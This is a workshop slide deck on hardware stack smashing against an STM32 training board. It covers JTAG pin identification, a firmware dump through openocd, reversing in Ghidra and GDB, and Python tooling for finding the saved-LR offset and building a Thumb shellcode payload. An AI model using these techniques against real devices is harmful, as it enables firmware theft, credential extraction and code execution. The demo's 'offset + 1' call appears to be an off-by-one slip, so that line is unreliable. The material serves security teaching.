# Stack Smashing on Hardware
(From basics to implementation)
---
## Outline
* Basic concept
* Extracting firmware using JTAG, openocd, telnet
* Firmware reverse-engineering basics using GDB and Ghidra
* Stack exploitation implementation
---
## Basic Concept
* Stack
* Stack Pointer
* Buffer Overflow
---
## Debugging Ports
* JTAG
* SWD
---
## JTAG PORT Identification
( Demo using DIVA IoT Board )
---
* Trace the header pins back to the microcontroller using the datasheet pinout and a digital multimeter continuity test
* Find the controller datasheet online (STM32F411RE: http://www.st.com/resource/en/datasheet/stm32f411re.pdf)
---

---
* Multimeter (DMM) in continuity mode: one probe on a header pin, the other on the candidate MCU pin

---

---
* The pins identified (J3 pin header; in brackets the MCU pin number on the LQFP64 package, with the port pin expected there per the datasheet):
* Pin 1 - TCK (49, PA14/JTCK)
* Pin 3 - TMS (46, PA13/JTMS)
* Pin 5 - TDI (50, PA15/JTDI)
* Pin 7 - TDO (55, PB3/JTDO)
* Pin 9 - TRST (56, PB4/NJTRST)
* Pins 8, 10 - GND
* Other methods - JTAGenum or JTAGulator (brute-force the pinout of an unlabelled header)
---
* FT2232-based Expliot-nano as the JTAG adapter

---
* openocd to interface with the JTAG port (adapter config first, then the target config)
* openocd -f /path/to/ftdiAdapter.cfg -f /path/to/target/stm32f4x.cfg
* telnet to talk to openocd's command server on port 4444 (its GDB server listens on 3333)
* telnet localhost 4444
---
* Identify the flash base address and total size (datasheet memory map, or `flash banks` / `flash info 0` in the openocd telnet session)

---
**Flash memory: 0x08000000 - 0x0807ffff (512 KB)**
* Firmware dump
* reset halt
* dump_image filename.bin 0x08000000 0x80000
* The length argument is the full 0x80000 bytes: the end address 0x0807ffff is inclusive, so 0x7ffff would miss the last byte
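Before reversing the dump it is worth checking that it is complete and that its vector table makes sense, which confirms the base address and endianness used later in Ghidra. The script below is an added example, not from the original slides; it assumes the STM32F411RE memory map (512 KB flash at 0x08000000, 128 KB SRAM at 0x20000000) and uses a constructed stand-in image rather than a real dump.

```python
"""Sanity checks on a raw flash dump before reversing it.

Added example, not from the original slides. Assumes the STM32F411RE memory map:
512 KB flash at 0x08000000 and 128 KB SRAM at 0x20000000. The sample image is constructed.
"""
import re
import struct
from typing import Dict, List, Tuple

FLASH_BASE = 0x08000000
FLASH_SIZE = 0x80000      # 0x08000000-0x0807FFFF inclusive, so dump_image length is 0x80000
SRAM_BASE = 0x20000000
SRAM_SIZE = 0x20000


def dump_is_complete(image: bytes) -> bool:
    """A dump of the whole bank must be exactly FLASH_SIZE bytes (0x7ffff would drop the last byte)."""
    return len(image) == FLASH_SIZE


def check_vector_table(image: bytes) -> Dict[str, object]:
    """Cortex-M vector table starts at flash offset 0: word 0 is the initial SP, word 1 the reset
    handler (Thumb code, so bit 0 set). Sane values mean the dump base and endianness are right."""
    if len(image) < 8:
        raise ValueError("image too short to contain a vector table")
    sp, reset = struct.unpack_from("<II", image, 0)
    sp_ok = SRAM_BASE < sp <= SRAM_BASE + SRAM_SIZE
    reset_ok = bool(reset & 1) and FLASH_BASE <= (reset & ~1) < FLASH_BASE + FLASH_SIZE
    return {
        "initial_sp": sp,
        "reset_handler": reset,
        "sp_ok": sp_ok,
        "reset_ok": reset_ok,
        # offset of the reset handler inside the .bin: where to start disassembling in Ghidra/GDB
        "reset_offset": (reset & ~1) - FLASH_BASE if reset_ok else None,
    }


def find_strings(image: bytes, min_len: int = 6) -> List[Tuple[int, str]]:
    """strings(1)-style scan returning (flash address, text); hardcoded credentials show up here."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(FLASH_BASE + m.start(), m.group().decode("ascii")) for m in pattern.finditer(image)]


def build_sample_image() -> bytes:
    """Constructed 512-byte stand-in for a dump (not a real firmware)."""
    img = bytearray(0x200)
    # SP at the top of SRAM, reset handler at flash offset 0x100 with the Thumb bit set
    struct.pack_into("<II", img, 0, SRAM_BASE + SRAM_SIZE, FLASH_BASE + 0x100 + 1)
    secret = b"admin:s3cretPass\x00"   # the kind of hardcoded credential a strings scan turns up
    img[0x180:0x180 + len(secret)] = secret
    return bytes(img)


if __name__ == "__main__":
    sample = build_sample_image()
    print("complete dump:", dump_is_complete(sample))
    print("vector table:", check_vector_table(sample))
    print("strings:", find_strings(sample))
```

Run it against the real `filename.bin` by replacing `build_sample_image()` with `open("filename.bin", "rb").read()`; an erased or mis-based dump shows up immediately as an SP outside SRAM or a reset vector of 0xFFFFFFFF.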
---
* Impact -
* strings (hardcoded passwords and other secrets)
* modify and reflash the code
* ...and many more
---
* Raw .bin analysis in Ghidra: import it with the ARM Cortex little-endian language and base address 0x08000000, so that vector-table entries and absolute pointers resolve
* Attach GDB to openocd's GDB server while the target is halted:
* gdb-multiarch
* set arch arm
* target remote localhost:3333
---
* Identify the offset from the start of the buffer to the saved return address (LR) - the vulnerable point
* ARM (Thumb) shellcode that writes a particular register
* Smash the stack and inject your own shellcode using a Python script
* Caveats: the return address must have bit 0 set (Thumb state, otherwise the return faults); bare-metal Cortex-M has no ASLR and, unless the MPU forbids it, executes code from SRAM, so the buffer's stack address seen in GDB can be used directly
* Yep, divert the original firmware logic and get your code executed
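The host-side part of that procedure, as an added example rather than the deck's own script: a cyclic pattern to recover the saved-LR offset from the register value GDB shows after the crash, the payload builder with the Thumb bit set on the return address, and a bad-byte check, because any SRAM address (0x2000xxxx) contains a 0x00 byte that a strcpy-style copy would truncate on. The shellcode here is a constructed 4-byte stand-in (`movs r0, #0x41; b .`), the buffer address 0x20001000 is assumed, and the target is assumed to be a little-endian Cortex-M with no ASLR.

```python
"""Host-side exploit tooling for the stack smash: find the saved-LR offset, then build the payload.

Added example, not the original deck's script. Assumes a Cortex-M target (Thumb code,
little-endian, no ASLR) and that the buffer's stack address is known from GDB.
"""
import struct
from typing import List, Optional

PATTERN_PERIOD = 26 * 26 * 10 * 3   # 20280 bytes before the pattern repeats


def cyclic_pattern(length: int) -> bytes:
    """Metasploit-style pattern 'Aa0Aa1Aa2...': every 4-byte window is unique within one period,
    so the bytes that land in LR/PC identify their own position in the input."""
    out = bytearray()
    for upper in range(ord("A"), ord("Z") + 1):
        for lower in range(ord("a"), ord("z") + 1):
            for digit in range(ord("0"), ord("9") + 1):
                out += bytes((upper, lower, digit))
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def offset_from_crash(reg_value: int, pattern_len: int = PATTERN_PERIOD) -> Optional[int]:
    """Send cyclic_pattern(pattern_len) to the vulnerable input, read the register that took the
    pattern (e.g. 'p/x $lr' in GDB after the fault) and pass its value here.
    The Thumb bit may have been set or cleared on the way into PC, so both parities are tried."""
    pattern = cyclic_pattern(pattern_len)
    for candidate in (reg_value, reg_value ^ 1):
        idx = pattern.find(struct.pack("<I", candidate & 0xFFFFFFFF))
        if idx != -1:
            return idx
    return None


def build_payload(offset: int, shellcode: bytes, shellcode_addr: int) -> bytes:
    """Layout: [shellcode][padding up to the saved LR][return address -> shellcode].
    shellcode_addr is the (even) stack address of the buffer; bit 0 is set so the function
    return lands in Thumb state instead of raising a UsageFault."""
    if len(shellcode) > offset:
        raise ValueError("shellcode does not fit before the saved return address")
    if shellcode_addr & 1:
        raise ValueError("pass the even (halfword-aligned) buffer address; bit 0 is set here")
    ret = struct.pack("<I", (shellcode_addr | 1) & 0xFFFFFFFF)
    return shellcode + b"A" * (offset - len(shellcode)) + ret


def bad_byte_positions(payload: bytes, bad: bytes = b"\x00") -> List[int]:
    """If the overflow goes through a strcpy/gets-style copy, a NUL (or newline) byte truncates
    the payload. SRAM addresses such as 0x2000xxxx always contain 0x00, so check before sending:
    a hit means the copy primitive must be length-based (memcpy/read) for this layout to work."""
    return [i for i, b in enumerate(payload) if b in bad]


# Constructed stand-in for the real register-writing shellcode (no NUL bytes):
#   2041  movs r0, #0x41
#   e7fe  b .            (spin so the effect can be observed in GDB)
PLACEHOLDER_SHELLCODE = b"\x41\x20\xfe\xe7"

if __name__ == "__main__":
    # Assumed values: offset recovered from the crash, buffer address read from GDB.
    crashed_lr = 0x32624131                 # what 'p/x $lr' showed after sending the pattern
    offset = offset_from_crash(crashed_lr)
    payload = build_payload(offset + 1, PLACEHOLDER_SHELLCODE, 0x20001000)
    print("offset:", offset, "payload:", payload.hex())
    print("bytes a strcpy would choke on:", bad_byte_positions(payload))
```

The offset returned is the number of input bytes before the saved return address; feed the payload to the vulnerable input over whatever channel the firmware reads it from (UART, network), with the target halted under GDB first so the diverted PC can be confirmed.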
---
## Reference
* http://www-inst.eecs.berkeley.edu/~cs161/fa08/papers/stack_smashing.pdf
---
## Thank You